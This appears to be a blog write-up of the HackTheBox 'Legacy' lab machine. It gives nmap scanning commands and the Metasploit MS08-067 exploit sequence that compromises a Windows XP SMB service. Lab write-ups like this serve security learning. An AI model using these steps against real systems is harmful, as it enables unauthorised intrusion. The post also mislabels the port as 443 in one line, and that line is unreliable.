HackTheBox – Legacy

I am starting a series where I go through HackTheBox virtual machines.

HackTheBox is an environment where we can exploit multiple machines and get points for them.

Legacy

Legacy is a fairly simple machine. We start by doing a simple NMAP scan to determine what is on the machine.

nmap 10.10.10.4

As we can see, port 445 is using microsoft-ds which we know was vulnerable to CVE-2008-4250. If we previously did not know this information, there is a very useful NMAP script that can help us find vulnerable services.

nmap –script vuln -p 445 10.10.10.4

As you can see, this nmap script has found the vulnerability in port 443 to be smb-vuln-ms08-067

Now we can fire up Metasploit and search for this exploit.

search ms08-067

We have successfully found an exploit for this machine. Now we just need to use this exploit, and set it to our RHOST machine, then exploit it.

use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.4
exploit

That was easy. Now we need to find the flags for user and own root.

user.txt is located on the desktop C:\Documents and Settings\john\Desktop and contains the hash to own the user.

In order to own root, we need to navigate to the Desktop in the administrator folder.

getuid

No one should be using Windows XP in 2018 as it contains multiple vulnerabilities that cybercriminals can take advantage of.

Leave a Reply

Your email address will not be published. Required fields are marked *